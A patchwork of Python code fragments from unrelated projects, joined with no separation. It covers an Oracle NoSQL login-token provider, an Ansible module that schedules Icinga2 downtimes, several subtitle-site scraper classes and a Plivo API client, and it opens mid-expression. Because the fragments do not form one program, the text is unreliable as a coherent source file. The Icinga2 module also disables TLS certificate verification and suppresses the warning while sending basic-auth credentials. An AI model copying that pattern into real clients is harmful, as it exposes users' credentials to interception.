(StoreAccessTokenProvider._BEARER_PREFIX + self._parse_json_result(content)) # Schedule login token renew thread. self._schedule_refresh() except (ConnectionError, InvalidAuthorizationException) as e: self._logutils.log_debug(format_exc()) raise e except Exception as e: self._logutils.log_debug(format_exc()) raise NoSQLException('Bootstrap login fail.', e) @synchronized def close(self): """ Close the provider, releasing resources such as a stored login token. """ # Don't do anything for non-secure case. if not self._is_secure or self._is_closed: return # Send request for logout. try: response = self._send_request( self._auth_string, StoreAccessTokenProvider._LOGOUT_SERVICE) if response.get_status_code() != codes.ok: self._logutils.log_info('Failed to logout user ' + self._user_name + ': ' + response.get_content()) except Exception as e: self._logutils.log_info('Failed to logout user ' + self._user_name + ': ' + str(e)) # Clean up. self._is_closed = True self._auth_string = None self._expiration_time = 0 self._password = None if self._timer is not None: self._timer.cancel() self._timer = None if self._sess is not None: self._sess.close() def get_authorization_string(self, request=None): if (request is not None and not isinstance(request, borneo.operations.Request)): raise IllegalArgumentException( 'get_authorization_string requires an instance of Request or ' + 'None as parameter.') if not self._is_secure or self._is_closed: return None # If there is no cached auth string, re-authentication to retrieve the # login token and generate the auth string. if self._auth_string is None: self.bootstrap_login() return self._auth_string def is_secure(self): """ Returns whether the provider is accessing a secured store. :returns: True if accessing a secure store, otherwise False. :rtype: bool """ return self._is_secure def set_auto_renew(self, auto_renew): """ Sets the auto-renew state. If True, automatic renewal of the login token is enabled. :param auto_renew: set to True to enable auto-renew. :type auto_renew: bool :returns: self. :raises IllegalArgumentException: raises the exception if auto_renew is not True or False. """ CheckValue.check_boolean(auto_renew, 'auto_renew') self._auto_renew = auto_renew return self def is_auto_renew(self): """ Returns whether the login token is to be automatically renewed. :returns: True if auto-renew is set, otherwise False. :rtype: bool """ return self._auto_renew def set_endpoint(self, endpoint): """ Sets the endpoint of the on-prem proxy. :param endpoint: the endpoint. :type endpoint: str :returns: self. :raises IllegalArgumentException: raises the exception if endpoint is not a string. """ CheckValue.check_str(endpoint, 'endpoint') self._endpoint = endpoint self._url = borneo.config.NoSQLHandleConfig.create_url(endpoint, '') if self._is_secure and self._url.scheme.lower() != 'https': raise IllegalArgumentException( 'StoreAccessTokenProvider requires use of https.') return self def get_endpoint(self): """ Returns the endpoint of the on-prem proxy. :returns: the endpoint. :rtype: str """ return self._endpoint def set_logger(self, logger): CheckValue.check_logger(logger, 'logger') self._logger = logger self._logutils = LogUtils(logger) return self def get_logger(self): return self._logger def set_ssl_context(self, ssl_ctx): # Internal use only adapter = SSLAdapter(ssl_ctx) self._sess.mount(self._url.scheme + '://', adapter) def set_url_for_test(self): self._url = urlparse(self._url.geturl().replace('https', 'http')) return self def validate_auth_string(self, auth_string): if self._is_secure and auth_string is None: raise IllegalArgumentException( 'Secured StoreAccessProvider requires a non-none string.') def _parse_json_result(self, json_result): # Retrieve login token from JSON string. result = loads(json_result) # Extract expiration time from JSON result. self._expiration_time = result['expireAt'] # Extract login token from JSON result. return result['token'] def _refresh_task(self): """ This task sends a request to the server for login session extension. Depending on the server policy, a new login token with new expiration time may or may not be granted. """ if not self._is_secure or not self._auto_renew or self._is_closed: return try: old_auth = self._auth_string response = self._send_request( old_auth, StoreAccessTokenProvider._RENEW_SERVICE) token = self._parse_json_result(response.get_content()) if response.get_status_code() != codes.ok: raise InvalidAuthorizationException(token) if self._is_closed: return with self._lock: if self._auth_string == old_auth: self._auth_string = ( StoreAccessTokenProvider._BEARER_PREFIX + token) self._schedule_refresh() except Exception as e: self._logutils.log_info('Failed to renew login token: ' + str(e)) if self._timer is not None: self._timer.cancel() self._timer = None def _schedule_refresh(self): # Schedule a login token renew when half of the token life time is # reached. if not self._is_secure or not self._auto_renew: return # Clean up any existing timer if self._timer is not None: self._timer.cancel() self._timer = None acquire_time = int(round(time() * 1000)) if self._expiration_time <= 0: return # If it is 10 seconds before expiration, don't do further renew to avoid # to many renew request in the last few seconds. if self._expiration_time > acquire_time + 10000: renew_time = (acquire_time + (self._expiration_time - acquire_time) // 2) self._timer = Timer( float(renew_time - acquire_time) / 1000, self._refresh_task) self._timer.start() def _send_request(self, auth_header, service_name): # Send HTTPS request to login/renew/logout service location with proper # authentication information. headers = {'Host': self._url.hostname, 'Authorization': auth_header} return self._request_utils.do_get_request( self._url.geturl() + self._base_path + service_name, headers, StoreAccessTokenProvider._HTTP_TIMEOUT_MS)
class Icinga2Api(object): """ Main Class to implement the Icinga2 API Client """ module = None def __init__(self): """ Initialize all needed Variables """ self.icinga_host = module.params.get("host") self.icinga_port = module.params.get("port") self.icinga_username = module.params.get("username") self.icinga_password = module.params.get("password") self.state = module.params.get("state") self.hostname = module.params.get("hostname") self.hostnames = module.params.get("hostnames") self.start_time = module.params.get("start_time") self.end_time = module.params.get("end_time") self.duration = module.params.get("duration") self.object_type = module.params.get("object_type") self.all_services = module.params.get("all_services") self.author = module.params.get("author") self.comment = module.params.get("comment") self.fixed = module.params.get("fixed") self.filter_vars = None self.trigger_name = None self.icinga_url = "{0}:{1}/v1".format(self.icinga_host, self.icinga_port) self.connection = Session() self.connection.headers.update({'Accept': 'application/json'}) self.connection.auth = (self.icinga_username, self.icinga_password) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def run(self): res = dict(changed=False, ansible_module_results="none") print("hostname : {} ({})".format(self.hostname, type(self.hostname))) print("hostnames : {} ({})".format(self.hostnames, type(self.hostnames))) if self.hostname and self.hostnames: module.fail_json(msg=("Please choose whether to set downtimes for " "'hostname' or 'hostnames'. " "Both at the same time is not supported.")) if len(self.hostnames) != 0: res['changed'] = True r = dict() if iter(self.hostnames): for h in self.hostnames: r[h] = dict() if self.__host_exists(h): """ """ payload = { 'type': self.object_type, 'filter': "host.name == \"{}\"".format(h), 'author': self.author, 'comment': self.comment, 'start_time': self.start_time, 'end_time': self.end_time, 'duration': self.duration } if self.fixed: payload.update(fixed=True) else: payload.update(fixed=False) if self.filter_vars: payload.update(filter_vars=self.filter_vars) if self.trigger_name: payload.update(trigger_name=self.trigger_name) if self.object_type == 'Host' and self.all_services is True: payload.update(all_services=True) module.log(msg="downtime for: {}".format(h)) module.log(msg="payload: {}".format(payload)) code, msg = self.__schedule_downtime(payload) module.log(msg="{}: {}".format(code, msg)) r[h] = dict( msg=msg, status_code=code, ) else: module.log(msg="404: host {} is not known".format(h)) r[h] = dict( msg="host {} is not known".format(h), status_code=404, ) res['result'] = r elif len(self.hostname) != 0: pass else: print("hoo") # print(res) # result = dict(changed=True, # ansible_module_results="Downtimes removed", # result=dict(req.json(), status_code=req.status_code)) return res def __call_url(self, method='GET', path=None, data=None, headers=None): """ """ if headers is None: headers = { 'Accept': 'application/json', 'X-HTTP-Method-Override': method, } url = "{0}/{1}".format(self.icinga_url, path) print(url) self.connection.headers.update(headers) try: if (method == 'GET'): ret = self.connection.get(url, verify=False) self.connection.close() elif (method == 'POST'): self.connection.close() ret = self.connection.post(url, data=data, verify=False) else: print("unsupported") ret.raise_for_status() # print("------------------------------------------------------------------") # print(" text : {}".format(ret.text)) # print(" headers : {}".format(ret.headers)) # print(" code : {}".format(ret.status_code)) # print("------------------------------------------------------------------") return ret.status_code, json.loads(ret.text) except Exception as e: print(e) raise def __host_exists(self, hostname): """ """ code = 0 data = { "type": "Host", "attrs": ["name"], "filter": "match(\"{0}\", host.name)".format(hostname), } code, ret = self.__call_url(method='POST', path="objects/hosts", data=module.jsonify(data), headers={ 'Accept': 'application/json', 'X-HTTP-Method-Override': 'GET' }) results = ret['results'] if (code == 200 and len(results) != 0): # code = results[0]['code'] # status = results[0]['status'] attrs = results[0]['attrs'] if attrs.get('name') == hostname: return True return False def __schedule_downtime(self, data): """ """ code = 0 status = "no status available" path = 'actions/schedule-downtime' code, ret = self.__call_url(method='POST', path=path, data=module.jsonify(data), headers={ 'Accept': 'application/json', 'X-HTTP-Method-Override': 'POST' }) results = ret['results'] if (len(results) != 0): # print(json.dumps(results[0])) code = int(results[0]['code']) status = results[0]['status'] return code, status
class TitloviProvider(Provider, ProviderSubtitleArchiveMixin): subtitle_class = TitloviSubtitle languages = {Language.fromtitlovi(l) for l in language_converters['titlovi'].codes} | {Language.fromietf('sr-Latn')} server_url = 'https://titlovi.com' search_url = server_url + '/titlovi/?' download_url = server_url + '/download/?type=1&mediaid=' def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' \ '(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' logger.debug('User-Agent set to %s', self.session.headers['User-Agent']) self.session.headers['Referer'] = self.server_url logger.debug('Referer set to %s', self.session.headers['Referer']) def terminate(self): self.session.close() def query(self, languages, title, season=None, episode=None, year=None, video=None): items_per_page = 10 current_page = 1 used_languages = languages lang_strings = [str(lang) for lang in used_languages] # handle possible duplicate use of Serbian Latin if "sr" in lang_strings and "sr-Latn" in lang_strings: logger.info('Duplicate entries <Language [sr]> and <Language [sr-Latn]> found, filtering languages') used_languages = filter(lambda l: l != Language.fromietf('sr-Latn'), used_languages) logger.info('Filtered language list %r', used_languages) # convert list of languages into search string langs = '|'.join(map(str, [l.titlovi for l in used_languages])) # set query params params = {'prijevod': title, 'jezik': langs} is_episode = False if season and episode: is_episode = True params['s'] = season params['e'] = episode if year: params['g'] = year # loop through paginated results logger.info('Searching subtitles %r', params) subtitles = [] while True: # query the server try: r = self.session.get(self.search_url, params=params, timeout=10) r.raise_for_status() soup = BeautifulSoup(r.content, 'lxml') # number of results result_count = int(soup.select_one('.results_count b').string) except: result_count = None # exit if no results if not result_count: if not subtitles: logger.debug('No subtitles found') else: logger.debug("No more subtitles found") break # number of pages with results pages = int(math.ceil(result_count / float(items_per_page))) # get current page if 'pg' in params: current_page = int(params['pg']) try: sublist = soup.select('section.titlovi > ul.titlovi > li') for sub in sublist: # subtitle id sid = sub.find(attrs={'data-id': True}).attrs['data-id'] # get download link download_link = self.download_url + sid # title and alternate title match = title_re.search(sub.a.string) if match: _title = match.group('title') alt_title = match.group('altitle') else: continue # page link page_link = self.server_url + sub.a.attrs['href'] # subtitle language match = lang_re.search(sub.select_one('.lang').attrs['src']) if match: try: # decode language lang = Language.fromtitlovi(match.group('lang')+match.group('script')) except ValueError: continue # relase year or series start year match = year_re.search(sub.find(attrs={'data-id': True}).parent.i.string) if match: r_year = int(match.group('year')) # fps match = fps_re.search(sub.select_one('.fps').string) if match: fps = match.group('fps') # releases releases = str(sub.select_one('.fps').parent.contents[0].string) # handle movies and series separately if is_episode: # season and episode info sxe = sub.select_one('.s0xe0y').string r_season = None r_episode = None if sxe: match = season_re.search(sxe) if match: r_season = int(match.group('season')) match = episode_re.search(sxe) if match: r_episode = int(match.group('episode')) subtitle = self.subtitle_class(lang, page_link, download_link, sid, releases, _title, alt_title=alt_title, season=r_season, episode=r_episode, year=r_year, fps=fps, asked_for_release_group=video.release_group, asked_for_episode=episode) else: subtitle = self.subtitle_class(lang, page_link, download_link, sid, releases, _title, alt_title=alt_title, year=r_year, fps=fps, asked_for_release_group=video.release_group) logger.debug('Found subtitle %r', subtitle) # prime our matches so we can use the values later subtitle.get_matches(video) # add found subtitles subtitles.append(subtitle) finally: soup.decompose() # stop on last page if current_page >= pages: break # increment current page params['pg'] = current_page + 1 logger.debug('Getting page %d', params['pg']) return subtitles def list_subtitles(self, video, languages): season = episode = None if isinstance(video, Episode): title = video.series season = video.season episode = video.episode else: title = video.title return [s for s in self.query(languages, fix_inconsistent_naming(title), season=season, episode=episode, year=video.year, video=video)] def download_subtitle(self, subtitle): r = self.session.get(subtitle.download_link, timeout=10) r.raise_for_status() # open the archive archive_stream = io.BytesIO(r.content) if is_rarfile(archive_stream): logger.debug('Archive identified as rar') archive = RarFile(archive_stream) elif is_zipfile(archive_stream): logger.debug('Archive identified as zip') archive = ZipFile(archive_stream) else: subtitle.content = r.content if subtitle.is_valid(): return subtitle.content = None raise ProviderError('Unidentified archive type') subs_in_archive = archive.namelist() # if Serbian lat and cyr versions are packed together, try to find right version if len(subs_in_archive) > 1 and (subtitle.language == 'sr' or subtitle.language == 'sr-Cyrl'): self.get_subtitle_from_bundled_archive(subtitle, subs_in_archive, archive) else: # use default method for everything else subtitle.content = self.get_subtitle_from_archive(subtitle, archive) def get_subtitle_from_bundled_archive(self, subtitle, subs_in_archive, archive): sr_lat_subs = [] sr_cyr_subs = [] sub_to_extract = None for sub_name in subs_in_archive: if not ('.cyr' in sub_name or '.cir' in sub_name): sr_lat_subs.append(sub_name) if ('.cyr' in sub_name or '.cir' in sub_name) and not '.lat' in sub_name: sr_cyr_subs.append(sub_name) if subtitle.language == 'sr': if len(sr_lat_subs) > 0: sub_to_extract = sr_lat_subs[0] if subtitle.language == 'sr-Cyrl': if len(sr_cyr_subs) > 0: sub_to_extract = sr_cyr_subs[0] logger.info(u'Using %s from the archive', sub_to_extract) subtitle.content = fix_line_ending(archive.read(sub_to_extract))
class BSPlayerProvider(Provider): """BSPlayer Provider.""" languages = {Language('por', 'BR')} | { Language(l) for l in [ 'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra', 'hun', 'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus', 'spa', 'swe', 'tur', 'ukr', 'zho' ] } SEARCH_THROTTLE = 8 hash_verifiable = True # batantly based on kodi's bsplayer plugin # also took from BSPlayer-Subtitles-Downloader def __init__(self): self.initialize() def initialize(self): self.session = Session() self.search_url = self.get_sub_domain() self.token = None self.login() def terminate(self): self.session.close() self.logout() def api_request(self, func_name='logIn', params='', tries=5): headers = { 'User-Agent': 'BSPlayer/2.x (1022.12360)', 'Content-Type': 'text/xml; charset=utf-8', 'Connection': 'close', 'SOAPAction': '"http://api.bsplayer-subtitles.com/v1.php#{func_name}"'.format( func_name=func_name) } data = ( '<?xml version="1.0" encoding="UTF-8"?>\n' '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" ' 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" ' 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="{search_url}">' '<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' '<ns1:{func_name}>{params}</ns1:{func_name}></SOAP-ENV:Body></SOAP-ENV:Envelope>' ).format(search_url=self.search_url, func_name=func_name, params=params) logger.info('Sending request: %s.' % func_name) for i in iter(range(tries)): try: self.session.headers.update(headers.items()) res = self.session.post(self.search_url, data) return ElementTree.fromstring(res.text) except Exception as ex: logger.info("ERROR: %s." % ex) if func_name == 'logIn': self.search_url = self.get_sub_domain() sleep(1) logger.info('ERROR: Too many tries (%d)...' % tries) raise Exception('Too many tries...') def login(self): # If already logged in if self.token: return True root = self.api_request(func_name='logIn', params=('<username></username>' '<password></password>' '<AppID>BSPlayer v2.67</AppID>')) res = root.find('.//return') if res.find('status').text == 'OK': self.token = res.find('data').text logger.info("Logged In Successfully.") return True return False def logout(self): # If already logged out / not logged in if not self.token: return True root = self.api_request( func_name='logOut', params='<handle>{token}</handle>'.format(token=self.token)) res = root.find('.//return') self.token = None if res.find('status').text == 'OK': logger.info("Logged Out Successfully.") return True return False def query(self, video, video_hash, language): if not self.login(): return [] if isinstance(language, (tuple, list, set)): # language_ids = ",".join(language) # language_ids = 'spa' language_ids = ','.join(sorted(l.opensubtitles for l in language)) if video.imdb_id is None: imdbId = '*' else: imdbId = video.imdb_id sleep(self.SEARCH_THROTTLE) root = self.api_request( func_name='searchSubtitles', params=('<handle>{token}</handle>' '<movieHash>{movie_hash}</movieHash>' '<movieSize>{movie_size}</movieSize>' '<languageId>{language_ids}</languageId>' '<imdbId>{imdbId}</imdbId>').format( token=self.token, movie_hash=video_hash, movie_size=video.size, language_ids=language_ids, imdbId=imdbId)) res = root.find('.//return/result') if res.find('status').text != 'OK': return [] items = root.findall('.//return/data/item') subtitles = [] if items: logger.info("Subtitles Found.") for item in items: subID = item.find('subID').text subDownloadLink = item.find('subDownloadLink').text subLang = Language.fromopensubtitles(item.find('subLang').text) subName = item.find('subName').text subFormat = item.find('subFormat').text subtitles.append( BSPlayerSubtitle(subLang, subName, subFormat, video, subDownloadLink)) return subtitles def list_subtitles(self, video, languages): return self.query(video, video.hashes['bsplayer'], languages) def get_sub_domain(self): # s1-9, s101-109 SUB_DOMAINS = [ 's1', 's2', 's3', 's4', 's5', 's6', 's7', 's8', 's9', 's101', 's102', 's103', 's104', 's105', 's106', 's107', 's108', 's109' ] API_URL_TEMPLATE = "http://{sub_domain}.api.bsplayer-subtitles.com/v1.php" sub_domains_end = len(SUB_DOMAINS) - 1 return API_URL_TEMPLATE.format( sub_domain=SUB_DOMAINS[random.randint(0, sub_domains_end)]) def download_subtitle(self, subtitle): session = Session() _addheaders = {'User-Agent': 'Mozilla/4.0 (compatible; Synapse)'} session.headers.update(_addheaders) res = session.get(subtitle.page_link) if res: if res.text == '500': raise ValueError('Error 500 on server') with gzip.GzipFile(fileobj=io.BytesIO(res.content)) as gf: subtitle.content = gf.read() subtitle.normalize() return subtitle raise ValueError('Problems conecting to the server')
def close(self): requestsSession.close(self) if self.ownPool: self.pool.stop()
class BaseClient(object): def __init__(self, auth_id=None, auth_token=None, proxies=None, timeout=5): """ The Plivo API client. Deals with all the API requests to be made. """ self.base_uri = PLIVO_API_BASE_URI self.session = Session() self.session.headers.update({ 'User-Agent': get_user_agent(), 'Content-Type': 'application/json', 'Accept': 'application/json', }) self.session.auth = fetch_credentials(auth_id, auth_token) self.multipart_session = Session() self.multipart_session.headers.update({ 'User-Agent': get_user_agent(), 'Cache-Control': 'no-cache', }) self.multipart_session.auth = fetch_credentials(auth_id, auth_token) self.proxies = proxies self.timeout = timeout def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.session.close() self.multipart_session.close() def process_response(self, method, response, response_type=None, objects_type=None): """Processes the API response based on the status codes and method used to access the API """ try: response_json = response.json(object_hook=lambda x: ResponseObject( x) if isinstance(x, dict) else x) if response_type: r = response_type(self, response_json.__dict__) response_json = r if 'objects' in response_json and objects_type: response_json.objects = [ objects_type(self, obj.__dict__) for obj in response_json.objects ] except ValueError: response_json = None if response.status_code == 400: if response_json and 'error' in response_json: raise ValidationError(response_json.error) raise ValidationError( 'A parameter is missing or is invalid while accessing resource' 'at: {url}'.format(url=response.url)) if response.status_code == 401: if response_json and 'error' in response_json: raise AuthenticationError(response_json.error) raise AuthenticationError( 'Failed to authenticate while accessing resource at: ' '{url}'.format(url=response.url)) if response.status_code == 404: if response_json and 'error' in response_json: raise ResourceNotFoundError(response_json.error) raise ResourceNotFoundError( 'Resource not found at: {url}'.format(url=response.url)) if response.status_code == 405: if response_json and 'error' in response_json: raise InvalidRequestError(response_json.error) raise InvalidRequestError( 'HTTP method "{method}" not allowed to access resource at: ' '{url}'.format(method=method, url=response.url)) if response.status_code == 500: if response_json and 'error' in response_json: raise PlivoServerError(response_json.error) raise PlivoServerError( 'A server error occurred while accessing resource at: ' '{url}'.format(url=response.url)) if method == 'DELETE': if response.status_code != 204: raise PlivoRestError('Resource at {url} could not be ' 'deleted'.format(url=response.url)) elif response.status_code not in [200, 201, 202]: raise PlivoRestError( 'Received status code {status_code} for the HTTP method ' '"{method}"'.format(status_code=response.status_code, method=method)) return response_json def create_request(self, method, path=None, data=None): path = path or [] req = Request( method, '/'.join([self.base_uri, self.session.auth[0]] + list([str(p) for p in path])) + '/', **({ 'params': data } if method == 'GET' else { 'json': data })) return self.session.prepare_request(req) def create_multipart_request(self, method, path=None, data=None, files=None): path = path or [] data_args = {} if method == 'GET': data_args['params'] = data else: data_args['data'] = data if files and 'file' in files and files['file'] != '': data_args['files'] = files req = Request( method, '/'.join([self.base_uri, self.multipart_session.auth[0]] + list([str(p) for p in path])) + '/', **(data_args)) return self.multipart_session.prepare_request(req) def send_request(self, request, **kwargs): if 'session' in kwargs: session = kwargs['session'] del kwargs['session'] else: session = self.session return session.send(request, proxies=self.proxies, timeout=self.timeout, **kwargs) def request(self, method, path=None, data=None, response_type=None, objects_type=None, files=None, **kwargs): if files is not None: req = self.create_multipart_request(method, path, data, files) session = self.multipart_session else: req = self.create_request(method, path, data) session = self.session kwargs['session'] = session res = self.send_request(req, **kwargs) return self.process_response(method, res, response_type, objects_type)
class Addic7edProvider(Provider): languages = {Language('por', 'BR')} | {Language(l) for l in [ 'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho' ]} video_types = (Episode,) server_url = 'http://www.addic7ed.com/' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False def initialize(self): self.session = Session() self.session.headers = {'User-Agent': 'Subliminal/%s' % get_version(__version__)} # login if self.username is not None and self.password is not None: logger.info('Logging in') data = {'username': self.username, 'password': self.password, 'Submit': 'Log in'} r = self.session.post(self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10) if r.status_code != 302: raise AuthenticationError(self.username) logger.debug('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get(self.server_url + 'logout.php', timeout=10) r.raise_for_status() logger.debug('Logged out') self.logged_in = False self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows.php` page. :return: show id per series, lower case and without quotes. :rtype: dict """ # get the show page logger.info('Getting show ids') r = self.session.get(self.server_url + 'shows.php', timeout=10) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # populate the show ids show_ids = {} for show in soup.select('td.version > h3 > a[href^="/show/"]'): show_ids[sanitize_string(show.text).lower()] = int(show['href'][6:]) logger.debug('Found %d show ids', len(show_ids)) return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int or None :return: the show id, if found. :rtype: int or None """ # build the params series_year = '%s %d' % (series, year) if year is not None else series params = {'search': sanitize_string(series_year, replacement=' '), 'Submit': 'Search'} # make the search logger.info('Searching show ids with %r', params) r = self.session.get(self.server_url + 'search.php', params=params, timeout=10) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # get the suggestion suggestion = soup.select('span.titulo > a[href^="/show/"]') if not suggestion: logger.warning('Show id not found: no suggestion') return None if not sanitized_string_equal(suggestion[0].i.text, series_year): logger.warning('Show id not found: suggestion does not match') return None show_id = int(suggestion[0]['href'][6:]) logger.debug('Found show id %d', show_id) return show_id def get_show_id(self, series, year=None, country_code=None): """Get the best matching show id for `series`, `year` and `country_code`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id` :param str series: series of the episode. :param year: year of the series, if any. :type year: int or None :param country_code: country code of the series, if any. :type country_code: str or None :return: the show id, if found. :rtype: int or None """ series_sanitized = sanitize_string(series).lower() show_ids = self._get_show_ids() show_id = None # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower())) # attempt with year if not show_id and year: logger.debug('Getting show id with year') show_id = show_ids.get('%s %d' % (series_sanitized, year)) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) # search as last resort if not show_id: logger.warning('Series not found in show ids') show_id = self._search_show_id(series) return show_id def query(self, series, season, year=None, country=None): # get the show id show_id = self.get_show_id(series, year, country) if show_id is None: logger.error('No show id found for %r (%r)', series, {'year': year, 'country': country}) return [] # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'show/%d' % show_id, params={'season': season}, timeout=10) r.raise_for_status() if r.status_code == 304: raise TooManyRequests() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over subtitle rows match = series_year_re.match(soup.select('#header font')[0].text.strip()[:-10]) series = match.group('series') year = int(match.group('year')) if match.group('year') else None subtitles = [] for row in soup.select('tr.epeven'): cells = row('td') # ignore incomplete subtitles status = cells[5].text if status != 'Completed': logger.debug('Ignoring subtitle with status %s', status) continue # read the item language = Language.fromaddic7ed(cells[3].text) hearing_impaired = bool(cells[6].text) page_link = self.server_url + cells[2].a['href'][1:] season = int(cells[0].text) episode = int(cells[1].text) title = cells[2].text version = cells[4].text download_link = cells[9].a['href'][1:] subtitle = Addic7edSubtitle(language, hearing_impaired, page_link, series, season, episode, title, year, version, download_link) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): return [s for s in self.query(video.series, video.season, video.year) if s.language in languages and s.episode == video.episode] def download_subtitle(self, subtitle): # download the subtitle logger.info('Downloading subtitle %r', subtitle) r = self.session.get(self.server_url + subtitle.download_link, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() # detect download limit exceeded if r.headers['Content-Type'] == 'text/html': raise DownloadLimitExceeded subtitle.content = fix_line_ending(r.content)
class HosszupuskaProvider(Provider, ProviderSubtitleArchiveMixin): """Hosszupuska Provider.""" languages = {Language('hun', 'HU')} | {Language(l) for l in [ 'hun', 'eng' ]} video_types = (Episode,) server_url = 'http://hosszupuskasub.com/' subtitle_class = HosszupuskaSubtitle hearing_impaired_verifiable = False multi_result_throttle = 2 # seconds def initialize(self): self.session = Session() self.session.headers = {'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2")} def terminate(self): self.session.close() def get_language(self, text): if text == '1.gif': return Language.fromhosszupuska('hu') if text == '2.gif': return Language.fromhosszupuska('en') return None def query(self, series, season, episode, year=None, video=None): # Search for s01e03 instead of s1e3 seasona = "%02d" % season episodea = "%02d" % episode series = fix_inconsistent_naming(series) seriesa = series.replace(' ', '+').replace('\'', '') # get the episode page logger.info('Getting the page for episode %s', episode) url = self.server_url + "sorozatok.php?cim=" + seriesa + "&evad="+str(seasona) + \ "&resz="+str(episodea)+"&nyelvtipus=%25&x=24&y=8" logger.info('Url %s', url) r = self.session.get(url, timeout=10).content i = 0 soup = ParserBeautifulSoup(r, ['lxml']) table = soup.find_all("table")[9] subtitles = [] # loop over subtitles rows for row in table.find_all("tr"): i = i + 1 if "this.style.backgroundImage='url(css/over2.jpg)" in str(row) and i > 5: datas = row.find_all("td") # Currently subliminal not use these params, but maybe later will come in handy # hunagrian_name = re.split('s(\d{1,2})', datas[1].find_all('b')[0].getText())[0] # Translator of subtitle # sub_translator = datas[3].getText() # Posting date of subtitle # sub_date = datas[4].getText() sub_year = sub_english_name = sub_version = None # Handle the case when '(' in subtitle if datas[1].getText().count('(') == 2: sub_english_name = re.split('s(\d{1,2})e(\d{1,2})', datas[1].getText())[3] if datas[1].getText().count('(') == 3: sub_year = re.findall(r"(?<=\()(\d{4})(?=\))", datas[1].getText().strip())[0] sub_english_name = re.split('s(\d{1,2})e(\d{1,2})', datas[1].getText().split('(')[0])[0] if not sub_english_name: continue sub_season = int((re.findall('s(\d{1,2})', datas[1].find_all('b')[0].getText(), re.VERBOSE)[0]) .lstrip('0')) sub_episode = int((re.findall('e(\d{1,2})', datas[1].find_all('b')[0].getText(), re.VERBOSE)[0]) .lstrip('0')) if sub_season == season and sub_episode == episode: sub_language = self.get_language(datas[2].find_all('img')[0]['src'].split('/')[1]) sub_downloadlink = datas[6].find_all('a')[1]['href'] sub_id = sub_downloadlink.split('=')[1].split('.')[0] if datas[1].getText().count('(') == 2: sub_version = datas[1].getText().split('(')[1].split(')')[0] if datas[1].getText().count('(') == 3: sub_version = datas[1].getText().split('(')[2].split(')')[0] # One subtitle can be used for several releases sub_releases = [s.strip() for s in sub_version.split(',')] subtitle = self.subtitle_class(sub_language, sub_downloadlink, sub_id, sub_english_name.strip(), sub_season, sub_episode, sub_version, sub_releases, sub_year, asked_for_release_group=video.release_group, asked_for_episode=episode) logger.debug('Found subtitle: %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): titles = [video.series] + video.alternative_series for title in titles: subs = self.query(title, video.season, video.episode, video.year, video=video) if subs: return subs time.sleep(self.multi_result_throttle) def download_subtitle(self, subtitle): r = self.session.get(subtitle.page_link, timeout=10) r.raise_for_status() # open the archive archive_stream = io.BytesIO(r.content) if is_rarfile(archive_stream): logger.debug('Archive identified as rar') archive = RarFile(archive_stream) elif is_zipfile(archive_stream): logger.debug('Archive identified as zip') archive = ZipFile(archive_stream) else: raise ProviderError('Unidentified archive type') subtitle.content = self.get_subtitle_from_archive(subtitle, archive)
